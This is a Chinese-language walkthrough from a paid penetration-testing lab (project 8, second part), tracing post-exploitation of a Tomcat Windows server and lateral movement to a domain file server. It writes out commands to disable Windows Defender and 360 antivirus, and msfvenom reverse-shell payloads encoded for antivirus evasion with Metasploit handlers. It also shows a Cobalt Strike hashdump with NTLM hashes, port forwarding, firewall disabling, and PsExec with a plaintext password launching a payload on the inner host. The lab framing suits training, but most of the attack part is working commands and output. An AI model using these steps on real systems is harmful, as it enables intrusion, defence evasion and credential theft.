like4h

暗月渗透实战靶场-项目八（下）

00x6-tomcat主机发现

tomcat主机信息搜集

网卡信息

ipconfig /all

主机名tomcat-web

两块网卡

路由器信息

arp -a

结果

接口: 10.10.1.129 --- 0x6
  Internet 地址         物理地址              类型
  10.10.1.1             00-50-56-c0-00-12     动态        
  10.10.1.255           ff-ff-ff-ff-ff-ff     静态        
  224.0.0.22            01-00-5e-00-00-16     静态        
  224.0.0.251           01-00-5e-00-00-fb     静态        
  224.0.0.252           01-00-5e-00-00-fc     静态        
  239.255.255.250       01-00-5e-7f-ff-fa     静态        
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态        

接口: 192.168.1.124 --- 0xc
  Internet 地址         物理地址              类型
  192.168.1.1           00-50-56-c0-00-08     动态        
  192.168.1.130         00-0c-29-90-71-c3     动态        
  192.168.1.254         00-50-56-fc-85-ce     动态        
  192.168.1.255         ff-ff-ff-ff-ff-ff     静态        
  224.0.0.22            01-00-5e-00-00-16     静态        
  224.0.0.252           01-00-5e-00-00-fc     静态        
  239.255.255.250       01-00-5e-7f-ff-fa     静态

端口信息

netstat -ano

结果

netstat -ano

Connection list
===============

    Proto  Local address                    Remote address      State        User  Inode  PID/Program name
    -----  -------------                    --------------      -----        ----  -----  ----------------
    tcp    0.0.0.0:135                      0.0.0.0:*           LISTEN       0     0      796/svchost.exe
    tcp    0.0.0.0:445                      0.0.0.0:*           LISTEN       0     0      4/System
    tcp    0.0.0.0:3306                     0.0.0.0:*           LISTEN       0     0      1920/mysqld.exe
    tcp    0.0.0.0:5985                     0.0.0.0:*           LISTEN       0     0      4/System
    tcp    0.0.0.0:8009                     0.0.0.0:*           LISTEN       0     0      5528/java.exe
    tcp    0.0.0.0:8080                     0.0.0.0:*           LISTEN       0     0      5528/java.exe
    tcp    0.0.0.0:47001                    0.0.0.0:*           LISTEN       0     0      4/System
    tcp    0.0.0.0:49664                    0.0.0.0:*           LISTEN       0     0      516/wininit.exe
    tcp    0.0.0.0:49665                    0.0.0.0:*           LISTEN       0     0      968/svchost.exe
    tcp    0.0.0.0:49666                    0.0.0.0:*           LISTEN       0     0      928/svchost.exe
    tcp    0.0.0.0:49668                    0.0.0.0:*           LISTEN       0     0      1720/spoolsv.exe
    tcp    0.0.0.0:49669                    0.0.0.0:*           LISTEN       0     0      648/services.exe
    tcp    0.0.0.0:49675                    0.0.0.0:*           LISTEN       0     0      656/lsass.exe
    tcp    10.10.1.129:139                  0.0.0.0:*           LISTEN       0     0      4/System
    tcp    127.0.0.1:3306                   127.0.0.1:50617     ESTABLISHED  0     0      1920/mysqld.exe
    tcp    127.0.0.1:3306                   127.0.0.1:53060     ESTABLISHED  0     0      1920/mysqld.exe
    tcp    127.0.0.1:3306                   127.0.0.1:53068     ESTABLISHED  0     0      1920/mysqld.exe
    tcp    127.0.0.1:3306                   127.0.0.1:54388     ESTABLISHED  0     0      1920/mysqld.exe
    tcp    127.0.0.1:8005                   0.0.0.0:*           LISTEN       0     0      5528/java.exe
    tcp    127.0.0.1:49773                  127.0.0.1:49774     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49774                  127.0.0.1:49773     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49775                  127.0.0.1:49776     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49776                  127.0.0.1:49775     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49793                  127.0.0.1:49794     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49794                  127.0.0.1:49793     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49795                  127.0.0.1:49796     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49796                  127.0.0.1:49795     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49797                  127.0.0.1:49798     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49798                  127.0.0.1:49797     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49799                  127.0.0.1:49800     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49800                  127.0.0.1:49799     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:50617                  127.0.0.1:3306      ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:53060                  127.0.0.1:3306      ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:53068                  127.0.0.1:3306      ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:54388                  127.0.0.1:3306      ESTABLISHED  0     0      5528/java.exe
    tcp    192.168.1.124:139                0.0.0.0:*           LISTEN       0     0      4/System
    tcp    192.168.1.124:8080               192.168.1.1:57761   TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.1.124:50999              192.168.1.130:8888  ESTABLISHED  0     0      5528/java.exe
    tcp    192.168.1.124:54571              192.168.1.130:8888  ESTABLISHED  0     0      5528/java.exe
    tcp    192.168.1.124:57240              192.168.1.130:6068  ESTABLISHED  0     0      7444/B6Ehp013.exe
    tcp6   :::135                           :::*                LISTEN       0     0      796/svchost.exe
    tcp6   :::445                           :::*                LISTEN       0     0      4/System
    tcp6   :::3306                          :::*                LISTEN       0     0      1920/mysqld.exe
    tcp6   :::3389                          :::*                LISTEN       0     0      9336/svchost.exe
    tcp6   :::5985                          :::*                LISTEN       0     0      4/System
    tcp6   :::8009                          :::*                LISTEN       0     0      5528/java.exe
    tcp6   :::8080                          :::*                LISTEN       0     0      5528/java.exe
    tcp6   :::47001                         :::*                LISTEN       0     0      4/System
    tcp6   :::49664                         :::*                LISTEN       0     0      516/wininit.exe
    tcp6   :::49665                         :::*                LISTEN       0     0      968/svchost.exe
    tcp6   :::49666                         :::*                LISTEN       0     0      928/svchost.exe
    tcp6   :::49668                         :::*                LISTEN       0     0      1720/spoolsv.exe
    tcp6   :::49669                         :::*                LISTEN       0     0      648/services.exe
    tcp6   :::49675                         :::*                LISTEN       0     0      656/lsass.exe
    udp    0.0.0.0:3389                     0.0.0.0:*                        0     0      9336/svchost.exe
    udp    0.0.0.0:5050                     0.0.0.0:*                        0     0      760/svchost.exe
    udp    0.0.0.0:5353                     0.0.0.0:*                        0     0      1092/svchost.exe
    udp    0.0.0.0:5355                     0.0.0.0:*                        0     0      1092/svchost.exe
    udp    10.10.1.129:137                  0.0.0.0:*                        0     0      4/System
    udp    10.10.1.129:138                  0.0.0.0:*                        0     0      4/System
    udp    10.10.1.129:1900                 0.0.0.0:*                        0     0      3816/svchost.exe
    udp    10.10.1.129:50902                0.0.0.0:*                        0     0      3816/svchost.exe
    udp    127.0.0.1:1900                   0.0.0.0:*                        0     0      3816/svchost.exe
    udp    127.0.0.1:50903                  0.0.0.0:*                        0     0      3816/svchost.exe
    udp    192.168.1.124:137                0.0.0.0:*                        0     0      4/System
    udp    192.168.1.124:138                0.0.0.0:*                        0     0      4/System
    udp    192.168.1.124:1900               0.0.0.0:*                        0     0      3816/svchost.exe
    udp    192.168.1.124:50901              0.0.0.0:*                        0     0      3816/svchost.exe
    udp6   :::3389                          :::*                             0     0      9336/svchost.exe
    udp6   :::5353                          :::*                             0     0      1092/svchost.exe
    udp6   :::5355                          :::*                             0     0      1092/svchost.exe
    udp6   ::1:1900                         :::*                             0     0      3816/svchost.exe
    udp6   ::1:50900                        :::*                             0     0      3816/svchost.exe
    udp6   fe80::1479:3673:41d4:fdd7:1900   :::*                             0     0      3816/svchost.exe
    udp6   fe80::1479:3673:41d4:fdd7:50899  :::*                             0     0      3816/svchost.exe
    udp6   fe80::f1f5:a71e:7e7:ee7c:1900    :::*                             0     0      3816/svchost.exe
    udp6   fe80::f1f5:a71e:7e7:ee7c:50898   :::*                             0     0      3816/svchost.exe

主机信息

systeminfo

结果

C:\tomcat\bin>systeminfo
systeminfo

Host Name:                 TOMCAT-WEB     #计算机名称
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows 用户
Registered Organization:
Product ID:                00377-60000-00000-AA810
Original Install Date:     2020/11/3, 23:43:25
System Boot Time:          2022/2/3, 11:34:00
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 166 Stepping 0 GenuineIntel ~1608 Mhz
                           [02]: Intel64 Family 6 Model 166 Stepping 0 GenuineIntel ~1608 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16722896.B64.2008100651, 2020/8/10
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             zh-cn;Chinese (China)
Input Locale:              zh-cn;Chinese (China)
Time Zone:                 (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory:     3,327 MB
Available Physical Memory: 337 MB
Virtual Memory: Max Size:  8,454 MB
Virtual Memory: Available: 1,630 MB
Virtual Memory: In Use:    6,824 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP          #不在域控里面
Logon Server:              \\TOMCAT-WEB
Hotfix(s):                 2 Hotfix(s) Installed.      #程序补丁
                           [01]: KB3199986
                           [02]: KB3200970
Network Card(s):           2 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.1.124
                                 [02]: fe80::f1f5:a71e:7e7:ee7c
                           [02]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet1
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.1.129
                                 [02]: fe80::1479:3673:41d4:fdd7
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\tomcat\bin>

查看开启的服务

net start

结果

C:\tomcat\webapps\ROOT\uploads\1>net start
net start
These Windows services are started:

   360 ɱ▒▒ʵʱ▒▒▒▒▒▒ط▒▒▒
   Application Information
   Background Tasks Infrastructure Service
   Base Filtering Engine
   CDPUserSvc_11fd67
   CNG Key Isolation
   COM+ Event System
   COM+ System Application
   Connected User Experiences and Telemetry
   Contact Data_11fd67
   CoreMessaging
   Credential Manager
   Cryptographic Services
   DCOM Server Process Launcher
   Device Setup Manager
   DHCP Client
   Diagnostic Policy Service
   Diagnostic Service Host
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Geolocation Service
   Group Policy Client
   IP Helper
   IPsec Policy Agent
   Local Session Manager
   MYSQL56
   Network Connection Broker
   Network Connections
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Plug and Play
   Power
   Print Spooler
   Program Compatibility Assistant Service
   Remote Access Connection Manager
   Remote Procedure Call (RPC)
   RPC Endpoint Mapper
   Secondary Logon
   Secure Socket Tunneling Protocol Service
   Security Accounts Manager
   Server
   Shell Hardware Detection
   SSDP Discovery
   State Repository Service
   Storage Service
   System Event Notification Service
   System Events Broker
   Task Scheduler
   TCP/IP NetBIOS Helper
   Themes
   Tile Data model server
   Time Broker
   User Access Logging Service
   User Data Access_11fd67
   User Data Storage_11fd67
   User Manager
   User Profile Service
   VMware Alias Manager and Ticket Service
   VMware Tools
   Windows Connection Manager
   Windows Driver Foundation - User-mode Driver Framework
   Windows Event Log
   Windows Firewall
   Windows Font Cache Service
   Windows Management Instrumentation
   Windows Remote Management (WS-Management)
   Windows ▒▒▒▒֪ͨϵͳ▒▒▒▒
   Windows ▒▒▒֤▒▒▒▒▒▒▒▒▒
   WinHTTP Web Proxy Auto-Discovery Service
   Workstation
   ▒▒▒▒▒
   ͬ▒▒▒▒▒_11fd67
   ▒▒▒ߵ▒▒▒▒▒▒▒
   ▒▒▒▒豸ƽ̨▒▒▒▒

The command completed successfully.


C:\tomcat\webapps\ROOT\uploads\1>net user
net user

User accounts for \\TOMCAT-WEB

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
The command completed successfully.

查看进程

tasklist /svc

结果

C:\tomcat\bin>tasklist /svc
tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       352 N/A
csrss.exe                      420 N/A
wininit.exe                    516 N/A
csrss.exe                      524 N/A
winlogon.exe                   596 N/A
services.exe                   648 N/A
lsass.exe                      656 KeyIso, SamSs, VaultSvc
svchost.exe                    740 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe                    796 RpcEptMapper, RpcSs
dwm.exe                        876 N/A
svchost.exe                    928 Appinfo, DsmSvc, gpsvc, iphlpsvc, lfsvc,
                                   ProfSvc, RasMan, Schedule, seclogon, SENS,
                                   ShellHWDetection, Themes, UserManager,
                                   Winmgmt, WpnService
svchost.exe                    952 NcbService, Netman, PcaSvc, StorSvc,
                                   TrkWks, UALSVC, WdiSystemHost, wudfsvc
svchost.exe                    968 Dhcp, EventLog, lmhosts, RmSvc,
                                   TimeBrokerSvc
svchost.exe                     76 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe                    760 CDPSvc, EventSystem, FontCache,
                                   LicenseManager, netprofm, nsi, SstpSvc,
                                   WdiServiceHost, WinHttpAutoProxySvc
svchost.exe                   1092 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
360rps.exe                    1128 360rp             #360杀毒
svchost.exe                   1144 Wcmsvc
ZhuDongFangYu.exe             1156 ZhuDongFangYu
spoolsv.exe                   1720 Spooler
svchost.exe                   1780 DiagTrack
svchost.exe                   1832 StateRepository, tiledatamodelsvc
vmtoolsd.exe                  1844 VMTools
svchost.exe                   1868 LanmanServer
mysqld.exe                    1920 MYSQL56
VGAuthService.exe             1932 VGAuthService
MsMpEng.exe                   1948 WinDefend
svchost.exe                   2248 PolicyAgent
dllhost.exe                   2584 COMSysApp
msdtc.exe                     2808 MSDTC
WmiPrvSE.exe                  3000 N/A
WmiPrvSE.exe                  3664 N/A
svchost.exe                   3816 SSDPSRV
RuntimeBroker.exe             2340 N/A
sihost.exe                    2540 N/A
svchost.exe                   3524 CDPUserSvc_11fd67, OneSyncSvc_11fd67,
                                   PimIndexMaintenanceSvc_11fd67,
                                   UnistoreSvc_11fd67, UserDataSvc_11fd67
taskhostw.exe                 3876 N/A
ChsIME.exe                     884 N/A
explorer.exe                  3784 N/A
360rp.exe                     3808 N/A
360sd.exe                      872 N/A
ShellExperienceHost.exe       2576 N/A
SearchUI.exe                  2516 N/A
ServerManager.exe             4140 N/A
360Tray.exe                   4320 N/A
vm3dservice.exe               4812 N/A
vmtoolsd.exe                  4932 N/A
java.exe                      5528 N/A
conhost.exe                   5588 N/A
SoftMgrLite.exe               5192 N/A
ApplicationFrameHost.exe      4408 N/A
taskhostw.exe                 7116 N/A
MySQLInstallerConsole.exe     1672 N/A
conhost.exe                   6968 N/A
cmd.exe                       7204 N/A
conhost.exe                   9440 N/A
SimpleIME.exe                 9784 N/A
MpCmdRun.exe                 10216 N/A
HelpPane.exe                  9312 N/A
360Safe.exe                   8888 N/A          #360安全
360leakfixer.exe              9612 N/A          #360杀毒
SimpleIME.exe                 5780 N/A
sublime_text.exe               940 N/A
plugin_host.exe               8972 N/A
dllhost.exe                   6728 N/A
MpUXSrv.exe                  10052 N/A
MSASCui.exe                   8968 N/A
MSASCuiL.exe                 10936 N/A
iexplore.exe                 10944 N/A
iexplore.exe                 10444 N/A
wdswfsafe.exe                10080 N/A           #360杀毒-网盾
cmd.exe                      10272 N/A
conhost.exe                  10548 N/A
cmd.exe                       4420 N/A
conhost.exe                   3404 N/A
tasklist.exe                 10892 N/A

C:\tomcat\bin>



发现的杀软
360sd.exe：360杀毒
360rp.exe：360杀毒
360safe.exe：360安全卫士
360tray.exe：360实时保护
zhudongfangyu.exe：360主动防御
wdswfsafe.exe：360杀毒-网盾
msmpeng.exe：windows defender
mpcmdrun.exe：windows defender
msascui.exe：windows defender
msascuil.exe：windows defender

关闭windows Defeder

上传

执行

DefenderSwitch.exe -off

成功关闭

关闭360安全卫士

上传

执行

进程对比

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          4 K
System                           4 Services                   0        140 K
smss.exe                       352 Services                   0      1,196 K
csrss.exe                      420 Services                   0      4,192 K
wininit.exe                    516 Services                   0      5,076 K
csrss.exe                      524 Console                    1     11,632 K
winlogon.exe                   596 Console                    1     12,484 K
services.exe                   648 Services                   0      9,784 K
lsass.exe                      656 Services                   0     15,344 K
svchost.exe                    740 Services                   0     20,124 K
svchost.exe                    796 Services                   0     11,760 K
dwm.exe                        876 Console                    1    145,812 K
svchost.exe                    928 Services                   0     58,768 K
svchost.exe                    952 Services                   0     27,092 K
svchost.exe                    968 Services                   0     27,096 K
svchost.exe                     76 Services                   0     22,840 K
svchost.exe                    760 Services                   0     27,728 K
svchost.exe                   1092 Services                   0     27,396 K
360rps.exe                    1128 Services                   0      6,684 K
svchost.exe                   1144 Services                   0      7,268 K
ZhuDongFangYu.exe             1156 Services                   0     16,016 K
spoolsv.exe                   1720 Services                   0     16,436 K
svchost.exe                   1780 Services                   0     24,400 K
svchost.exe                   1832 Services                   0     18,844 K
vmtoolsd.exe                  1844 Services                   0     22,024 K
svchost.exe                   1868 Services                   0      8,196 K
mysqld.exe                    1920 Services                   0     38,748 K
VGAuthService.exe             1932 Services                   0     10,556 K
svchost.exe                   2248 Services                   0      7,156 K
dllhost.exe                   2584 Services                   0     12,760 K
msdtc.exe                     2808 Services                   0      9,740 K
WmiPrvSE.exe                  3000 Services                   0     29,508 K
WmiPrvSE.exe                  3664 Services                   0     19,212 K
svchost.exe                   3816 Services                   0      7,256 K
RuntimeBroker.exe             2340 Console                    1     20,908 K
sihost.exe                    2540 Console                    1     21,844 K
svchost.exe                   3524 Console                    1     20,548 K
taskhostw.exe                 3876 Console                    1     18,620 K
ChsIME.exe                     884 Console                    1     17,820 K
explorer.exe                  3784 Console                    1    130,004 K
360rp.exe                     3808 Console                    1     68,948 K
360sd.exe                      872 Console                    1      6,644 K
ShellExperienceHost.exe       2576 Console                    1     44,308 K
SearchUI.exe                  2516 Console                    1     19,392 K
ServerManager.exe             4140 Console                    1     72,420 K
vm3dservice.exe               4812 Console                    1      6,068 K
vmtoolsd.exe                  4932 Console                    1     45,584 K
java.exe                      5528 Console                    1    457,948 K
conhost.exe                   5588 Console                    1     17,828 K
SoftMgrLite.exe               5192 Console                    1     22,324 K
ApplicationFrameHost.exe      4408 Console                    1     19,440 K
taskhostw.exe                 7116 Console                    1     18,952 K
MySQLInstallerConsole.exe     1672 Services                   0      2,400 K
conhost.exe                   6968 Services                   0        580 K
cmd.exe                       7204 Console                    1      2,932 K
conhost.exe                   9440 Console                    1     18,148 K
SimpleIME.exe                 9784 Console                    1     12,312 K
HelpPane.exe                  9312 Console                    1     21,476 K
SimpleIME.exe                 5780 Console                    1     13,288 K
sublime_text.exe               940 Console                    1     39,356 K
plugin_host.exe               8972 Console                    1     24,472 K
dllhost.exe                   6728 Console                    1      8,120 K
MpUXSrv.exe                  10052 Console                    1      9,348 K
MSASCui.exe                   8968 Console                    1     30,048 K
MSASCuiL.exe                 10936 Console                    1     13,592 K
iexplore.exe                 10944 Console                    1     37,652 K
iexplore.exe                 10444 Console                    1     50,108 K
wdswfsafe.exe                10080 Console                    1     14,900 K
cmd.exe                      10744 Console                    1      3,232 K
conhost.exe                  10580 Console                    1      9,652 K
svchost.exe                   9028 Services                   0      9,004 K
tasklist.exe                  9144 Console                    1      7,856 K

结果
360sd.exe：360杀毒
360rp.exe：360杀毒
zhudongfangyu.exe：360主动防御
wdswfsafe.exe：360杀毒-网盾

只能关闭360安全卫士不能关闭360杀毒

Tips

只能关闭360安全卫士不能关闭360杀毒

尝试上传msf攻击载荷

生成攻击载荷

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6068 -e x86/shikata_ga_nai -i 12 -f c -o payload12.c

免杀生成exe

设置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6068
exploit -j

执行

成功上线

上传cs攻击载荷

生成攻击payload

免杀生成exe

上传

执行

成功上线

查看进程关闭360杀毒（刚刚只能关闭360安全卫士）

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       352 N/A
csrss.exe                      420 N/A
wininit.exe                    516 N/A
csrss.exe                      524 N/A
winlogon.exe                   596 N/A
services.exe                   648 N/A
lsass.exe                      656 KeyIso, SamSs, VaultSvc
svchost.exe                    740 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe                    796 RpcEptMapper, RpcSs
dwm.exe                        876 N/A
svchost.exe                    928 Appinfo, CertPropSvc, DsmSvc, gpsvc,
                                   IKEEXT, iphlpsvc, lfsvc, ProfSvc, RasMan,
                                   Schedule, seclogon, SENS, SessionEnv,
                                   ShellHWDetection, Themes, UserManager,
                                   Winmgmt, WpnService
svchost.exe                    952 NcbService, Netman, PcaSvc, ScDeviceEnum,
                                   StorSvc, TrkWks, UALSVC, UmRdpService,
                                   wudfsvc
svchost.exe                    968 Dhcp, EventLog, lmhosts, RmSvc,
                                   TimeBrokerSvc
svchost.exe                     76 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe                    760 CDPSvc, EventSystem, fdPHost, FontCache,
                                   LicenseManager, netprofm, nsi, SstpSvc,
                                   WdiServiceHost, WinHttpAutoProxySvc
svchost.exe                   1092 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
svchost.exe                   1144 Wcmsvc
spoolsv.exe                   1720 Spooler
svchost.exe                   1780 DiagTrack
svchost.exe                   1832 StateRepository, tiledatamodelsvc
vmtoolsd.exe                  1844 VMTools
svchost.exe                   1868 LanmanServer
mysqld.exe                    1920 MYSQL56
VGAuthService.exe             1932 VGAuthService
svchost.exe                   2248 PolicyAgent
dllhost.exe                   2584 COMSysApp
msdtc.exe                     2808 MSDTC
WmiPrvSE.exe                  3000 N/A
WmiPrvSE.exe                  3664 N/A
svchost.exe                   3816 SSDPSRV
RuntimeBroker.exe             2340 N/A
sihost.exe                    2540 N/A
svchost.exe                   3524 CDPUserSvc_11fd67, OneSyncSvc_11fd67,
                                   PimIndexMaintenanceSvc_11fd67,
                                   UnistoreSvc_11fd67, UserDataSvc_11fd67
taskhostw.exe                 3876 N/A
ChsIME.exe                     884 N/A
explorer.exe                  3784 N/A
ShellExperienceHost.exe       2576 N/A
SearchUI.exe                  2516 N/A
ServerManager.exe             4140 N/A
vm3dservice.exe               4812 N/A
vmtoolsd.exe                  4932 N/A
java.exe                      5528 N/A
conhost.exe                   5588 N/A
SoftMgrLite.exe               5192 N/A
ApplicationFrameHost.exe      4408 N/A
taskhostw.exe                 7116 N/A
MySQLInstallerConsole.exe     1672 N/A
conhost.exe                   6968 N/A
SimpleIME.exe                 9784 N/A
HelpPane.exe                  9312 N/A
sublime_text.exe               940 N/A
plugin_host.exe               8972 N/A
MpUXSrv.exe                  10052 N/A
iexplore.exe                 10944 N/A
iexplore.exe                 10444 N/A
cmd.exe                       7416 N/A
conhost.exe                   6760 N/A
FYifCwDC.exe                  7024 N/A
explorer.exe                 10820 N/A
cmd.exe                       4208 N/A
conhost.exe                   7220 N/A
cmd.exe                       5624 N/A
conhost.exe                   3360 N/A
svchost.exe                   9336 TermService
cmd.exe                      10156 N/A
conhost.exe                   3624 N/A
csrss.exe                     6092 N/A
winlogon.exe                  7056 N/A
LogonUI.exe                   7824 N/A
dwm.exe                       6396 N/A
rdpclip.exe                  10584 N/A
ChsIME.exe                    8596 N/A
cmd.exe                      10012 N/A
conhost.exe                   8360 N/A
SystemSettingsBroker.exe      9836 N/A
cmd.exe                        832 N/A
conhost.exe                   7436 N/A
cmd.exe                       9808 N/A
conhost.exe                   5804 N/A
PsExec.exe                    8132 N/A
cmd.exe                       8532 N/A
conhost.exe                   4172 N/A
cmd.exe                      10644 N/A
conhost.exe                   2072 N/A
tasklist.exe                  3428 N/A

对 tomcat-web 详细查看

密码

hashdump

结果

beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82553 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

解密

内网探测

portscan 10.10.1.0-10.10.1.254 139 arp 1024

结果

beacon> portscan 10.10.1.0-10.10.1.254 139 arp 1024
[*] Tasked beacon to scan ports 139 on 10.10.1.0-10.10.1.254
[+] host called home, sent: 75377 bytes
[+] received output:
(ARP) Target '10.10.1.1' is alive. 00-50-56-C0-00-12

[+] received output:
(ARP) Target '10.10.1.128' is alive. 00-0C-29-76-60-C6
(ARP) Target '10.10.1.129' is alive. 00-0C-29-49-BB-5D

[+] received output:
10.10.1.129:139
10.10.1.1:139

[+] received output:
Scanner module is complete

发现主机10.10.1.128

使用psexec上线其他主机

获取到tomcat机器的密码凭证、也已经探测到10.10.1.128机器的存在、使用CobalStrike的psexec工具进行批量上线内网机器

参考
http://redteam.today/2019/11/22/cobaltstrike%E5%9C%A8%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8%E4%B8%AD%E7%9A%84%E4%B8%8A%E7%BA%BF%E6%8A%80%E5%B7%A7/
https://blog.csdn.net/weixin_44276628/article/details/104782376
https://github.com/aleenzz/Cobalt_Strike_wiki/blob/master/%E7%AC%AC%E5%8D%81%E4%BA%94%E8%8A%82%5B%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F%20%5D.md

上线失败

00x7-发现域内主机

对1.128机器信息搜集

常用端口探测

proxychains4 sudo nmap -sT -Pn 10.10.1.128 -p 80,88,21,139,23,445,3389 --open

只开放了445端口

使用portscan扫描

portscan 10.10.1.128 445 arp

结果

beacon> portscan 10.10.1.128 445 arp
[*] Tasked beacon to scan ports 445 on 10.10.1.128
[+] host called home, sent: 75377 bytes
[+] received output:
(ARP) Target '10.10.1.128' is alive. 00-0C-29-76-60-C6
10.10.1.128:445 (platform: 500 version: 10.0 name: FILESERVER domain: FBI)
Scanner module is complete

主机名：FILESERVER

所属域：FBI

使用nmap进行探测

proxychains4 sudo nmap -A -p 445 -O 10.10.1.128

结果

445端口、机器为windows server 2008

尝试访问内网1.128机器

dir \\10.10.1.128\c$

结果

能够访问

开启tomcat主机的3389端口

进行远程访问

查看

尝试连接

失败

直接连接是连接不上的、查看能否访问

做个转发

portfwd add -l 3389 -p 3389 -r 192.168.1.124

将tomcat机器上的3389的流量转发到自己本机的3389端口

成功

将所有的防御都关掉、我们前面已经将defeder、360安全卫士关闭了、

小结

00x8-拿下内网域1.128机器会话

前面我们已经获取了1.124-tomcat机器的cs与msf的会话、同时还获取了tomcat机器的3389远程访问的权限、对于1.128内网file server机器只是开启了一个445的端口、这里我们采用的是进行反向连接的方法

MSF反向连接

先生成连接10.10.1.129的msf攻击载荷

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.129 LPORT=6068 -e x86/shikata_ga_nai -i 12 -f c -o 128to129.c

生成免杀exe

上传

复制到10.10.1.128的fileserver的机器上

copy 128to129.exe \\10.10.1.128\c$

查看

流量转发

将129机器上的6068端口转发到攻击机器192.168.1.130的6068端口

netsh interface portproxy add v4tov4 listenport=6068 connectport=6068 connectaddress=192.168.1.130

查看转发情况

netsh interface portproxy show all

Tips

如果上面的转发后、依旧是没有上面的规则、说明是防火墙没有关闭

禁用系统防火墙

netsh firewall set opmode disable

启用防火墙

netsh firewall set opmode enable

攻击机做监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6068
exploit -j

运行

在10.10.1.128-fileserver机器上运行攻击载荷

在namp上我们查看到的OA版本是Windows server 2008、at命令就无法使用了

上面我们在CobalStrike尝试使用psexec进行上线内网主机发现是失败的、但是这种方法是可以的、应该是目标机器不出网的原因、使用工具进行上线。

参考
https://www.ajsafe.com/news/25.html

使用工具

https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

下载

上传工具

再次运行

PsExec.exe \\10.10.1.128 -u administrator -p QWEasd123 -i c:/128to129.exe

这个最好是在远控上执行、因为第一次使用psexec.exe会有一个agree的弹窗需要确认

在终端session上无法执行

msf成功上线

信息

00x9-域内信息搜集

杀软扫描

tasklist /svc

结果

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       316 N/A
csrss.exe                      384 N/A
wininit.exe                    480 N/A
csrss.exe                      488 N/A
winlogon.exe                   556 N/A
services.exe                   604 N/A
lsass.exe                      612 KeyIso, Netlogon, SamSs, VaultSvc
svchost.exe                    700 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe                    760 RpcEptMapper, RpcSs
dwm.exe                        844 N/A
svchost.exe                    908 NcbService, Netman, PcaSvc, StorSvc,
                                   TrkWks, UALSVC, wudfsvc
svchost.exe                    916 Dhcp, EventLog, lmhosts, TimeBrokerSvc
svchost.exe                    924 CDPSvc, EventSystem, FontCache,
                                   LicenseManager, netprofm, nsi, W32Time,
                                   WinHttpAutoProxySvc
svchost.exe                   1012 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe                   1020 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
svchost.exe                   1104 Appinfo, DsmSvc, gpsvc, iphlpsvc, lfsvc,
